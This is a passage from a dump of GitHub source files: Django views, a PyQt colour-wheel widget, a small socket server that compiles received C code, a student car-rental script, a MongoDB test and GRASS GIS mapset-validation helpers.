math.factorial(len(combination))\n for count in Counter(combination).values():\n sub_result /= math.factorial(count)\n\n result += int(sub_result)\n\n return result\n","repo_name":"fspv/learning","sub_path":"l33tcode/letter-tile-possibilities.py","file_name":"letter-tile-possibilities.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"43371755293","text":"from typing import Any\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views import generic\nfrom final_app.models import Car, Account, Post\nfrom .forms import CarForm, CreateUserForm, UserProfileForm, PostForm\nfrom django.contrib.auth.models import User, Group\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import allowed_users\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\n# Create your views here.\n@login_required\ndef homepage(request):\n\n homepage_cars = Car.objects.order_by('-id')[:3]\n accounts = Account.objects.all()\n \n return render( request, 'final_app/homepage.html', { 'homepage_cars':homepage_cars, 'accounts':accounts })\n\n@login_required(login_url='login')\ndef createCar(request):\n\n form = CarForm()\n if request.method == 'POST':\n form = CarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home_page')\n return render(request, 'final_app/car_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef editCar(request, pk):\n\n car = get_object_or_404(Car, pk=pk)\n form = CarForm(request.POST, request.FILES, instance = car)\n if form.is_valid():\n form.save()\n return redirect('car-detail', pk)\n return render(request, 'final_app/car_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deleteCar(request, pk):\n\n car = get_object_or_404(Car, pk=pk)\n if request.method=='POST':\n car.delete()\n return redirect('home_page')\n return render(request, 'final_app/delete_car.html', {'car':car})\n\ndef registerPage(request):\n\n form = CreateUserForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n group = Group.objects.get(name='Users')\n user.groups.add(group)\n\n messages.success(request, 'Account was successfully created for ' + username)\n return redirect('create_profile')\n context = {'form':form}\n return render(request, 'registration/register.html', context)\n\ndef createProfile(request):\n\n form = UserProfileForm()\n if request.method == 'POST':\n form = UserProfileForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home_page')\n return render(request, 'final_app/profile_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef editAccount(request, pk):\n\n account = get_object_or_404(Account, pk=pk)\n form = UserProfileForm(request.POST or None, instance = account)\n if form.is_valid():\n form.save()\n return redirect('account-profile', pk)\n return render(request, 'final_app/profile_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deleteAccount(request, pk) :\n\n account = get_object_or_404(Account, pk=pk)\n if request.method=='POST':\n account.delete()\n return redirect('home_page')\n return render(request, 'final_app/delete_car.html', {'account':account})\n\n@login_required(login_url='login')\ndef createPost(request):\n \n form = PostForm()\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('posts')\n return render(request, 'final_app/post_form.html', {'form':form})\n\n@login_required(login_url='login')\ndef deletePost(request, pk):\n \n post = get_object_or_404(Post, pk=pk)\n if request.method == 'POST':\n post.delete()\n return redirect('posts')\n return render(request, 'final_app/delete_post.html', {'post':post})\n\nclass CarListView(LoginRequiredMixin,generic.ListView):\n model = Car\nclass CarDetailView(LoginRequiredMixin, generic.DetailView):\n model = Car\nclass AccountDetailView(LoginRequiredMixin, generic.DetailView):\n model = Account\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['account_cars'] = Car.objects.filter(owner_id=self.kwargs['pk'])\n return context\n \nclass PostListView(LoginRequiredMixin,generic.ListView):\n model = Post\nclass PostDetailView(LoginRequiredMixin, generic.DetailView):\n model = Post\n","repo_name":"Oscar2060/FinalProject","sub_path":"final_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18882514533","text":"from subprocess import call\nimport socket\nimport sys\nimport time\n\nconnect = 1\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = time.time() + 60\n\nserver_address = ('192.168.1.191', 10000)\nprint('starting server on {} port {}'.format(*server_address))\n\nsock.bind(server_address)\nsock.listen(1)\n\nwhile connect > 0:\n print('waiting for a connection')\n connection, client_address = sock.accept()\n\n try:\n print('connection from', client_address)\n while True:\n if time.time() > timeout:\n connect -= 1\n raise StopIteration\n data = connection.recv(1024)\n print('received {!r}'.format(data))\n connect -= 1\n raise StopIteration\n\n\n except StopIteration: pass\n\nprint(\"Goodbye\")\nconnection.close()\n\n\nwith open('stream_file.c', 'w') as stream_file:\n stream_file.write(data)\n\n\ncall([\"gcc\", \"stream_file.c\"])\n","repo_name":"JonReinhold/rube-goldberg-projects","sub_path":"expanded-hello-world/HelloServer.py","file_name":"HelloServer.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6331743973","text":"\nfrom math import cos, sin, pi, sqrt, atan2\nfrom PyQt4 import QtGui, QtCore\n\nfrom color.colors import *\nfrom widgets import *\n\nclass Wheel(CacheImage):\n def __init__(self, mixer=None, w=0, h=0):\n self.luma = 0.5\n CacheImage.__init__(self, mixer, w, h)\n\n def calc(self):\n self.colors = []\n for chroma in seq(0, 1, 0.05):\n steps = max( 100 * 2*pi*chroma / 5.0, 6)\n lst = []\n for hue in seq(0, 1, 1.0/steps):\n color = hcy(hue, chroma, self.luma)\n lst.append(color)\n self.colors.append(lst)\n\n def draw(self, w, h):\n assert w is not None\n assert h is not None\n assert w > 0\n assert h > 0\n self.image = QtGui.QImage(w, h, QtGui.QImage.Format_ARGB32_Premultiplied)\n assert not self.image.isNull()\n self.image.fill(0)\n qp = QtGui.QPainter()\n qp.begin(self.image)\n x0, y0 = w/2.0, h/2.0\n Rmax = min(w,h)/2.0\n step_chroma = 1.0 / float(len(self.colors))\n step_r = Rmax * step_chroma\n\n color = hcy(0,0,self.luma)\n qp.setBrush(color)\n qp.setPen(color)\n qp.drawEllipse(x0-step_r, y0-step_r, step_r*2 + 1, step_r*2 + 1)\n\n for i, ring in enumerate(self.colors[1:]):\n if i == 0:\n continue\n step_hue = 1.0/ float(len(ring))\n step_alpha = 360.0 * step_hue \n r = i*step_r\n R = (i+1)*step_r\n iw = ih = 2*r\n ow = oh = 2*R\n ox = (w-ow)/2.0\n oy = (h-oh)/2.0\n ix = (w-iw)/2.0\n iy = (h-ih)/2.0\n outrect = QtCore.QRectF(ox, oy, ow, oh)\n inrect = QtCore.QRectF(ix,iy, iw,ih)\n for j, color in enumerate(ring):\n a = 2*pi*j*step_hue\n b = 2*pi*(j+1)*step_hue\n alpha = j*step_alpha\n xA, yA = x0 + R*cos(a), y0 - R*sin(a)\n xB, yB = x0 + r*cos(b), y0 - r*sin(b)\n path = QtGui.QPainterPath()\n path.moveTo(xA, yA)\n path.arcTo(outrect, alpha, step_alpha)\n path.arcTo(inrect, (alpha+step_alpha), - step_alpha)\n #print(\"A: {}, {}\".format(xA,yA))\n #path.lineTo(xA, yA)\n #path.closeSubpath()\n qp.setPen(color)\n qp.drawPath(path)\n qp.fillPath(path, color)\n qp.end()\n\nclass Slider(CacheImage):\n def __init__(self, mixer=None, w=0, h=0):\n self.hue = 0\n CacheImage.__init__(self, mixer, w, h)\n\n N = 50\n\n def calc(self):\n self.colors = []\n for i in range(self.N):\n self.colors.append(hcy(self.hue, 1.0, 1.0 - i/float(self.N)))\n\n def draw(self, w, h):\n w = min(w, 30)\n self.image = QtGui.QImage(w, h, QtGui.QImage.Format_ARGB32_Premultiplied)\n self.image.fill(0)\n qp = QtGui.QPainter()\n qp.begin(self.image)\n rw = w\n rh = h / float(self.N)\n for i,color in enumerate(self.colors):\n x = 0\n y = i * rh\n qp.setBrush(color)\n qp.setPen(color)\n qp.drawRect(x,y, rw, rh)\n qp.end()\n\nclass WheelWidget(QtGui.QWidget):\n\n clicked = QtCore.pyqtSignal(bool, float, float)\n edited = QtCore.pyqtSignal()\n\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.cache = Wheel()\n self.mouse_pressed = False\n self._selected = None\n self.hue = 0\n self.chroma = 0\n self.luma = 0\n self._harmonized = None\n self._harmony = None\n self._harmony_parameter = 0.5\n self._dragged = None\n self.enable_editing = False\n\n def _get_nearest(self, x,y):\n if not self.enable_editing:\n return None\n if not self._harmonized:\n return None\n rho_min = None\n result = None\n for idx, pair in enumerate(self._harmonized):\n hue, chroma = pair\n x1,y1 = self._hc_to_xy(hue, chroma)\n rho2 = (x-x1)**2 + (y-y1)**2\n if rho2 < 25:\n if rho_min is None or rho2 < rho_min:\n rho_min = rho2\n result = idx\n print(\"Nearest to ({}, {}): #{}\".format(x,y,result))\n return result\n\n def mousePressEvent(self, event):\n #print(\"Mouse pressed\")\n self.setFocus(QtCore.Qt.OtherFocusReason)\n self.mouse_pressed = True\n if self._harmony is None:\n self._dragged = self._get_nearest(event.x(), event.y())\n event.accept()\n\n def mouseReleaseEvent(self, event):\n #print(\"Mouse released\")\n self.mouse_pressed = False\n x,y = event.x(), event.y()\n if self._dragged is None:\n self._select(x,y)\n self._dragged = None\n event.accept()\n\n def mouseMoveEvent(self, event):\n x,y = event.x(), event.y()\n if self.mouse_pressed:\n if self._dragged is None:\n self._select(x,y)\n else:\n self._drag(x,y)\n\n def wheelEvent(self, event):\n steps = event.delta()/120.0\n apply_to_harmonized = self.enable_editing and self._harmonized\n\n if event.modifiers() & QtCore.Qt.ControlModifier:\n fn = lambda h,c : ((h+0.01*steps)%1, c)\n else:\n fn = lambda h,c : (h, clip(c+0.1*steps))\n\n if apply_to_harmonized:\n self._harmonized = [fn(h,c) for h,c in self._harmonized]\n\n if self._selected:\n h,c = self._xy_to_hc(*self._selected)\n h1,c1 = fn(h,c)\n self._selected = self._hc_to_xy(h1,c1)\n self.hue = h1\n self.chroma = c1\n self.clicked.emit(self.mouse_pressed, h1,c1)\n\n self.repaint()\n if apply_to_harmonized:\n self.edited.emit()\n\n def _xy_to_hc(self, x,y):\n w, h = self.size().width(), self.size().height()\n x0, y0 = w/2.0, h/2.0\n R = min(x0,y0)\n dx, dy = x-x0, y-y0\n chroma = sqrt(dx**2 + dy**2)/R\n if chroma > 1.0:\n return None\n hue = atan2(-dy, dx)/(2*pi)\n return (hue, chroma)\n\n def _hc_to_xy(self, hue, chroma):\n w, h = self.size().width(), self.size().height()\n x0, y0 = w/2.0, h/2.0\n R = min(x0,y0)\n x = x0 + chroma*R*cos(hue*2*pi)\n y = y0 - chroma*R*sin(hue*2*pi)\n return (x,y)\n\n def _apply_hc(self, fn, xy):\n h,c = self._xy_to_hc(*xy)\n h1,c1 = fn(h,c)\n return self._hc_to_xy(h1,c1)\n\n def paintEvent(self, event):\n w, h = self.size().width(), self.size().height()\n image = self.cache.get(w, h)\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.drawImage(0, 0, image)\n\n if self._selected is not None:\n x,y = self._selected\n qp.setBrush(QtGui.QColor(255,255,255, 127))\n qp.setPen(Color(0,0,0))\n qp.drawEllipse(x-4, y-4, 8, 8)\n\n if self._harmonized is not None:\n for idx, pair in enumerate(self._harmonized):\n hue, chroma = pair\n x,y = self._hc_to_xy(hue, chroma)\n if self._dragged == idx:\n qp.setBrush(Color(255,255,255))\n else:\n qp.setBrush(QtGui.QColor(0,0,0,0))\n qp.setPen(Color(0,0,0))\n qp.drawRect(x-3, y-3, 6, 6)\n\n qp.end()\n\n def _drag(self, x,y):\n s = self._xy_to_hc(x,y)\n if s is None:\n return\n\n hue,chroma = s\n self._harmonized[self._dragged] = (hue, chroma)\n self.repaint()\n self.edited.emit()\n\n def _select(self, x, y):\n w, h = self.width(), self.height()\n x0, y0 = w/2.0, h/2.0\n dx, dy = x-x0, y-y0\n R = min(x0,y0)\n chroma = sqrt(dx**2 + dy**2)/R\n if chroma > 1.0:\n return\n hue = atan2(-dy, dx)/(2*pi)\n self._selected = x,y\n self.repaint()\n self.hue = hue\n self.chroma = chroma\n\n if self._harmony is not None:\n self._calc_harmony(self.get_color())\n\n self.clicked.emit(self.mouse_pressed, hue, chroma)\n\n def select(self, hue, chroma):\n x,y = self._hc_to_xy(hue, chroma)\n self._selected = x,y\n self._calc_harmony(hcy(hue, chroma, self.luma))\n #self.repaint()\n\n def get_color(self):\n return hcy(self.hue, self.chroma, self.luma)\n\n def set_luma(self, luma):\n self.luma = luma\n self.cache.luma = luma\n self.cache.redraw(self.width(), self.height())\n\n def _calc_harmony(self, current):\n if self._harmony is None:\n return\n #print(\"Calc harmony from {}\".format(str(current)))\n colors = self._harmony.get(current, self._harmony_parameter)\n self._harmonized = []\n for clr in colors:\n h,c,y = clr.getHCY()\n self._harmonized.append((h,c))\n\n def set_harmony(self, harmony, current):\n self._harmony = harmony\n self._calc_harmony(current)\n self.repaint()\n\n def set_harmony_parameter(self, value, current):\n self._harmony_parameter = value\n self._calc_harmony(current)\n self.repaint()\n\nclass SliderWidget(QtGui.QWidget):\n\n clicked = QtCore.pyqtSignal(bool, float)\n\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.cache = Slider()\n self.mouse_pressed = False\n self.luma = 0.5\n\n def mousePressEvent(self, event):\n #print(\"Mouse pressed\")\n self.setFocus(QtCore.Qt.OtherFocusReason)\n self.mouse_pressed = True\n event.accept()\n\n def mouseReleaseEvent(self, event):\n #print(\"Mouse released\")\n self.mouse_pressed = False\n x,y = event.x(), event.y()\n self._select(y)\n event.accept()\n\n def mouseMoveEvent(self, event):\n x,y = event.x(), event.y()\n if self.mouse_pressed:\n self._select(y)\n\n def wheelEvent(self, event):\n steps = event.delta()/120.0\n if self.luma is not None:\n self.luma = clip(self.luma + 0.05*steps)\n self.repaint()\n self.clicked.emit(self.mouse_pressed, self.luma)\n\n def paintEvent(self, event):\n w, h = self.size().width(), self.size().height()\n image = self.cache.get(w, h)\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.drawImage(0, 0, image)\n if self.luma is not None:\n y0 = (1.0 - self.luma) * h\n qp.setPen(Color(0,0,0))\n w = min(w, 35)\n qp.drawRect(0,y0-2, w, 4)\n qp.end()\n\n def _select(self, y):\n w, h = self.width(), self.height()\n self.luma = float(h-y)/float(h)\n #print(\"Slider._select({})\".format(self.luma))\n self.repaint()\n self.clicked.emit(self.mouse_pressed, self.luma)\n\n def select(self, luma):\n self.luma = luma\n #print(\"Slider.select({})\".format(self.luma))\n \n def get_luma(self):\n return self.luma\n\nclass HCYSelector(QtGui.QWidget):\n\n selected = QtCore.pyqtSignal(int, Color, Color)\n edited = QtCore.pyqtSignal()\n\n manual_edit_implemented = True\n\n def __init__(self, *args):\n QtGui.QWidget.__init__(self, *args)\n self.box = QtGui.QHBoxLayout()\n self.wheel = WheelWidget()\n self.slider = SliderWidget()\n self.box.addWidget(self.slider, 1)\n self.box.addWidget(self.wheel, 5)\n self.setLayout(self.box)\n self.wheel.clicked.connect(self._on_click_wheel)\n self.wheel.edited.connect(self._on_wheel_edited)\n self.slider.clicked.connect(self._on_click_slider)\n self.harmonies_selector = None\n self._prev_color = hcy(0,0,0)\n self._sequence = 0\n\n def mouseReleaseEvent(self, event):\n self._sequence += 1\n\n def _on_wheel_edited(self):\n self.edited.emit()\n\n def get_enable_editing(self):\n return self.wheel.enable_editing\n \n def set_enable_editing(self, value):\n self.wheel.enable_editing = value\n #print(\"Enable editing: {}\".format(value))\n if value and self.wheel._harmonized is None:\n self.wheel._harmonized = [(0,0.9), (0, 0.3), (0.5, 0.3), (0.5, 0.9)]\n\n enable_editing = property(get_enable_editing, set_enable_editing)\n\n def _on_click_wheel(self, mouse_pressed, hue, chroma):\n self.slider.cache.hue = hue\n self.slider.cache.redraw(self.slider.width(), self.slider.height())\n self.update()\n color = hcy(hue, chroma, self.slider.luma)\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def _on_click_slider(self, mouse_pressed, luma):\n self.wheel.set_luma(luma)\n self.update()\n color = hcy(self.wheel.hue, self.wheel.chroma, luma)\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def setColor(self, color, no_signal=False):\n if color is None:\n return\n h,c,y = color.getHCY()\n self.slider.cache.hue = h\n self.slider.cache.redraw(self.slider.width(), self.slider.height())\n self.slider.select(y)\n self.wheel.set_luma(y)\n self.wheel.select(h,c)\n self.update()\n if not no_signal:\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def getColor(self):\n return self.wheel.get_color()\n\n def set_harmonized(self, list):\n pass\n #self.wheel._harmonized = list\n #self.repaint()\n\n def setHarmony(self, harmony, idx=None):\n self.set_harmony(harmony)\n if self.harmonies_selector is not None and idx is not None:\n self.harmonies_selector.select_item(idx)\n\n def set_harmony(self, harmony):\n current = self.getColor()\n if current is None:\n return\n self.wheel.set_harmony(harmony, current)\n\n def set_harmony_parameter(self, value):\n self.wheel.set_harmony_parameter(value, self.getColor())\n\n def get_harmonized(self):\n if self.wheel._harmonized is None:\n return None\n return [hcy(hue, chroma, self.slider.luma) for hue, chroma in self.wheel._harmonized]\n\n\n\n","repo_name":"portnov/color-palette","sub_path":"palette-editor/widgets/wheel.py","file_name":"wheel.py","file_ext":"py","file_size_in_byte":14311,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"19"} +{"seq_id":"73889886764","text":"class RentCar:\r\n def __init__(self):\r\n self.car_list = {'Hatchback':30,'Sedan':50,'SUV':100}\r\n\r\n def display_details(self):\r\n print(\"Cost per day: \")\r\n print(\"Hatchback $\",self.car_list['Hatchback'])\r\n print('Sedan $',self.car_list['Sedan'])\r\n print('SUV $',self.car_list['SUV'])\r\n \r\n def calculate_price(self,name_car,days):\r\n if name_car in self.car_list:\r\n return days * self.car_list[name_car]\r\n if days>0:\r\n print('Error. days needs to be more than 0')\r\n else:\r\n print('Sorry, this car is not in our list')\r\n \r\nclass Customer:\r\n def rent_car(self,car):\r\n self.car_list.remove(car_list[car])\r\n print('Rent with success')\r\n \r\n \r\ncar = RentCar()\r\ncustomer = Customer()\r\ncar.display_details()\r\n\r\nwhile True:\r\n print('''\r\n Enter 1 to display the list of avaliable cars\r\n Enter 2 to rent a car\r\n Enter 3 to quit\r\n ''')\r\n user_choice = int(input())\r\n if user_choice is 1:\r\n car.display_details()\r\n\r\n elif user_choice is 2:\r\n car_name = input('Enter with the name of the car you want :')\r\n days = int(input('Enter the number of days you would like to borrow the car:'))\r\n total_price = car.calculate_price(car_name,days)\r\n print('The price will be : {}'.format(total_price))\r\n elif user_choice is 3:\r\n quit()","repo_name":"getmenova/pyPalace","sub_path":"Abstraction&Encapsulation/carrental2.py","file_name":"carrental2.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"33829316614","text":"# -*- coding: utf-8 -*- \n'''\nCreated on 2018年9月29日\n\n@author: Administrator\n'''\nfrom pymongo import MongoClient\nfrom pprint import pprint\nfrom bson.objectid import ObjectId\nimport re\nimport time\nimport datetime\n\ndef test_tk():\n mongo_host='local.vm.sss.com'\n mongo_port=27017\n \n client = MongoClient(mongo_host, mongo_port)\n \n db_platform_tk = client['platform-tk']\n ygbase_data_c = db_platform_tk['ygbaseData']\n \n data=ygbase_data_c.find_one()\n pprint(data)\n \n print(ObjectId())\n print('*'*100)\n print(ygbase_data_c.find({\"error\" : False, '_id': re.compile('^BFEGZSX060')}).count())\n # print(ygbase_data_c.find({\"error\" : False, '_id': {'$regex' : '^BFEGZSX060'}}).count())\n \n max_time=None\n min_time=None\n cnt=0\n for index, data in enumerate(ygbase_data_c.find({'_id': re.compile('^BFEGZSX060')})):\n tmp = data['date']\n max_time = tmp if max_time == None or max_time < tmp else max_time\n min_time = tmp if min_time == None or min_time > tmp else min_time\n cnt = index + 1\n print(max_time)\n print(min_time)\n print(cnt)\n print((max_time - min_time).seconds / cnt)\n\ndef test_time():\n mongo_host='local.vm.sss.com'\n mongo_port=27017\n \n client = MongoClient(mongo_host, mongo_port)\n \n database = client['fwgame']\n coll = database['timetest']\n# coll.insert(dict(_id=ObjectId().__str__(), time = datetime.datetime.now()))\n# data = coll.find_one()\n print(datetime.datetime.now())\n print(datetime.datetime.utcnow().timetuple())\n print(int(time.mktime(datetime.datetime.utcnow().timetuple()) * 1000))\n\ntest_time()\nprint('ok')","repo_name":"badboyf/fzk_python","sub_path":"fzk-py/src/mongo_t.py","file_name":"mongo_t.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38173451337","text":"\"\"\"\nChecking objects in a GRASS GIS Spatial Database\n\n(C) 2020 by the GRASS Development Team\nThis program is free software under the GNU General Public\nLicense (>=v2). Read the file COPYING that comes with GRASS\nfor details.\n\n.. sectionauthor:: Vaclav Petras \n\"\"\"\n\nimport datetime\nimport glob\nimport os\nimport sys\nfrom pathlib import Path\n\nimport grass.grassdb.config as cfg\nimport grass.script as gs\nfrom grass.script import gisenv\n\n\ndef mapset_exists(path, location=None, mapset=None):\n \"\"\"Returns True whether mapset path exists.\n\n Either only *path* is provided or all three parameters need to be provided.\n\n :param path: Path to a Mapset or to a GRASS GIS database directory\n :param location: name of a Location if not part of *path*\n :param mapset: name of a Mapset if not part of *path*\n \"\"\"\n if location and mapset:\n path = os.path.join(path, location, mapset)\n elif location or mapset:\n raise ValueError(_(\"Provide only path or all three parameters, not two\"))\n return os.path.exists(path)\n\n\ndef location_exists(path, location=None):\n \"\"\"Returns True whether location path exists.\n\n :param path: Path to a Location or to a GRASS GIS database directory\n :param location: name of a Location if not part of *path*\n \"\"\"\n if location:\n path = os.path.join(path, location)\n return os.path.exists(path)\n\n\n# TODO: distinguish between valid for getting maps and usable as current\n# https://lists.osgeo.org/pipermail/grass-dev/2016-September/082317.html\n# interface created according to the current usage\ndef is_mapset_valid(path, location=None, mapset=None):\n \"\"\"Return True if GRASS Mapset is valid\n\n Either only *path* is provided or all three parameters need to be provided.\n\n :param path: Path to a Mapset or to a GRASS GIS database directory\n :param location: name of a Location if not part of *path*\n :param mapset: name of a Mapset if not part of *path*\n \"\"\"\n # WIND is created from DEFAULT_WIND by `g.region -d` and functions\n # or modules which create a new mapset. Most modules will fail if\n # WIND doesn't exist (assuming that neither GRASS_REGION nor\n # WIND_OVERRIDE environmental variables are set).\n if location and mapset:\n path = os.path.join(path, location, mapset)\n elif location or mapset:\n raise ValueError(_(\"Provide only path or all three parameters, not two\"))\n return os.access(os.path.join(path, \"WIND\"), os.R_OK)\n\n\ndef is_location_valid(path, location=None):\n \"\"\"Return True if GRASS Location is valid\n\n :param path: Path to a Location or to a GRASS GIS database directory\n :param location: name of a Location if not part of *path*\n \"\"\"\n # DEFAULT_WIND file should not be required until you do something\n # that actually uses them. The check is just a heuristic; a directory\n # containing a PERMANENT/DEFAULT_WIND file is probably a GRASS\n # location, while a directory lacking it probably isn't.\n if location:\n path = os.path.join(path, location)\n return os.access(os.path.join(path, \"PERMANENT\", \"DEFAULT_WIND\"), os.F_OK)\n\n\ndef is_mapset_current(database, location, mapset):\n \"\"\"Return True if the given GRASS Mapset is the current mapset\"\"\"\n genv = gisenv()\n if (\n database == genv[\"GISDBASE\"]\n and location == genv[\"LOCATION_NAME\"]\n and mapset == genv[\"MAPSET\"]\n ):\n return True\n return False\n\n\ndef is_location_current(database, location):\n \"\"\"Return True if the given GRASS Location is the current location\"\"\"\n genv = gisenv()\n if database == genv[\"GISDBASE\"] and location == genv[\"LOCATION_NAME\"]:\n return True\n return False\n\n\ndef is_current_user_mapset_owner(mapset_path):\n \"\"\"Returns True if mapset owner is the current user.\n On Windows it always returns True.\"\"\"\n # Note that this does account for libgis built with SKIP_MAPSET_OWN_CHK\n # which disables the ownerships check, i.e., even if it was build with the\n # skip, it still needs the env variable.\n if os.environ.get(\"GRASS_SKIP_MAPSET_OWNER_CHECK\", None):\n # Mapset just needs to be accessible for writing.\n return os.access(mapset_path, os.W_OK)\n # Mapset needs to be owned by user.\n if sys.platform == \"win32\":\n return True\n stat_info = os.stat(mapset_path)\n mapset_uid = stat_info.st_uid\n return mapset_uid == os.getuid()\n\n\ndef is_different_mapset_owner(mapset_path):\n \"\"\"Returns True if mapset owner is different from the current user\"\"\"\n return not is_current_user_mapset_owner(mapset_path)\n\n\ndef get_mapset_owner(mapset_path):\n \"\"\"Returns mapset owner name or None if owner name unknown.\n On Windows it always returns None.\"\"\"\n if sys.platform == \"win32\":\n return None\n try:\n path = Path(mapset_path)\n return path.owner()\n except KeyError:\n return None\n\n\ndef is_fallback_session():\n \"\"\"Checks if a user encounters a fallback GRASS session.\n\n Returns True if a user encounters a fallback session.\n It occurs when a last mapset is not usable and at the same time\n a user is in a temporary location.\n \"\"\"\n if \"LAST_MAPSET_PATH\" in gisenv().keys():\n return is_mapset_current(\n os.environ[\"TMPDIR\"], cfg.temporary_location, cfg.permanent_mapset\n )\n return False\n\n\ndef is_first_time_user():\n \"\"\"Check if a user is a first-time user.\n\n Returns True if a user is a first-time user.\n It occurs when a gisrc file has initial settings either in last used mapset\n or in current mapset settings.\n \"\"\"\n genv = gisenv()\n if \"LAST_MAPSET_PATH\" in genv.keys():\n return genv[\"LAST_MAPSET_PATH\"] == os.path.join(\n os.getcwd(), cfg.unknown_location, cfg.unknown_mapset\n )\n return False\n\n\ndef is_mapset_locked(mapset_path):\n \"\"\"Check if the mapset is locked\"\"\"\n lock_name = \".gislock\"\n lockfile = os.path.join(mapset_path, lock_name)\n return os.path.exists(lockfile)\n\n\ndef get_lockfile_if_present(database, location, mapset):\n \"\"\"Return path to lock if present, None otherwise\n\n Returns the path as a string or None if nothing was found, so the\n return value can be used to test if the lock is present.\n \"\"\"\n lock_name = \".gislock\"\n lockfile = os.path.join(database, location, mapset, lock_name)\n if os.path.isfile(lockfile):\n return lockfile\n return None\n\n\ndef get_mapset_lock_info(mapset_path):\n \"\"\"Get information about .gislock file.\n Assumes lock file exists, use is_mapset_locked to find out.\n Returns information as a dictionary with keys\n 'owner' (None if unknown), 'lockpath', and 'timestamp'.\n \"\"\"\n info = {}\n lock_name = \".gislock\"\n info[\"lockpath\"] = os.path.join(mapset_path, lock_name)\n try:\n info[\"owner\"] = Path(info[\"lockpath\"]).owner()\n except KeyError:\n info[\"owner\"] = None\n info[\"timestamp\"] = (\n datetime.datetime.fromtimestamp(os.path.getmtime(info[\"lockpath\"]))\n ).replace(microsecond=0)\n return info\n\n\ndef can_start_in_mapset(mapset_path, ignore_lock=False):\n \"\"\"Check if a mapset from a gisrc file is usable for new session\"\"\"\n if not is_mapset_valid(mapset_path):\n return False\n if not is_current_user_mapset_owner(mapset_path):\n return False\n if not ignore_lock and is_mapset_locked(mapset_path):\n return False\n return True\n\n\ndef get_reason_id_mapset_not_usable(mapset_path):\n \"\"\"It finds a reason why mapset is not usable.\n\n Returns a reason id as a string.\n If mapset path is None or no reason found, returns None.\n \"\"\"\n # Check whether mapset exists\n if not os.path.exists(mapset_path):\n return \"non-existent\"\n # Check whether mapset is valid\n elif not is_mapset_valid(mapset_path):\n return \"invalid\"\n # Check whether mapset is owned by current user\n elif not is_current_user_mapset_owner(mapset_path):\n return \"different-owner\"\n # Check whether mapset is locked\n elif is_mapset_locked(mapset_path):\n return \"locked\"\n return None\n\n\ndef dir_contains_location(path):\n \"\"\"Return True if directory *path* contains a valid location\"\"\"\n if not os.path.isdir(path):\n return False\n for name in os.listdir(path):\n if os.path.isdir(os.path.join(path, name)):\n if is_location_valid(path, name):\n return True\n return False\n\n\n# basically checking location, possibly split into two functions\n# (mapset one can call location one)\ndef get_mapset_invalid_reason(database, location, mapset, none_for_no_reason=False):\n \"\"\"Returns a message describing what is wrong with the Mapset\n\n The goal is to provide the most suitable error message\n (rather than to do a quick check).\n\n :param database: Path to GRASS GIS database directory\n :param location: name of a Location\n :param mapset: name of a Mapset\n :returns: translated message\n \"\"\"\n # Since we are trying to get the one most likely message, we need all\n # those return statements here.\n # pylint: disable=too-many-return-statements\n location_path = os.path.join(database, location)\n mapset_path = os.path.join(location_path, mapset)\n # first checking the location validity\n # perhaps a special set of checks with different messages mentioning mapset\n # will be needed instead of the same set of messages used for location\n location_msg = get_location_invalid_reason(\n database, location, none_for_no_reason=True\n )\n if location_msg:\n return location_msg\n # if location is valid, check mapset\n if mapset not in os.listdir(location_path):\n # TODO: remove the grass.py specific wording\n return _(\n \"Mapset <{mapset}> doesn't exist in GRASS Location <{location}>\"\n ).format(mapset=mapset, location=location)\n if not os.path.isdir(mapset_path):\n return _(\"<%s> is not a GRASS Mapset because it is not a directory\") % mapset\n if not os.path.isfile(os.path.join(mapset_path, \"WIND\")):\n return (\n _(\n \"<%s> is not a valid GRASS Mapset\"\n \" because it does not have a WIND file\"\n )\n % mapset\n )\n # based on the is_mapset_valid() function\n if not os.access(os.path.join(mapset_path, \"WIND\"), os.R_OK):\n return (\n _(\n \"<%s> is not a valid GRASS Mapset\"\n \" because its WIND file is not readable\"\n )\n % mapset\n )\n # no reason for invalidity found (might be valid)\n if none_for_no_reason:\n return None\n return _(\n \"Mapset <{mapset}> or Location <{location}> is invalid for an unknown reason\"\n ).format(mapset=mapset, location=location)\n\n\ndef get_location_invalid_reason(database, location, none_for_no_reason=False):\n \"\"\"Returns a message describing what is wrong with the Location\n\n The goal is to provide the most suitable error message\n (rather than to do a quick check).\n\n By default, when no reason is found, a message about unknown reason is\n returned. This applies also to the case when this function is called on\n a valid location (e.g. as a part of larger 